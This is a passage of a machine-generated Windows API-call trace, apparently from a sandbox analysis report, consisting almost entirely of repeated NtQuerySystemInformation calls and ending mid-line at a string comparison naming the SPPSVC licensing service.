(SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x28, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0206.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x28, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0206.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccb0, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccb0, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccb0, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdb0, Length=0x20, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdb0, Length=0x20, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x50, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0206.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x28, ResultLength=0x0) [0206.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0206.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0206.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x20, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x20, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x28, ResultLength=0x0) [0206.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0206.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.705] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", 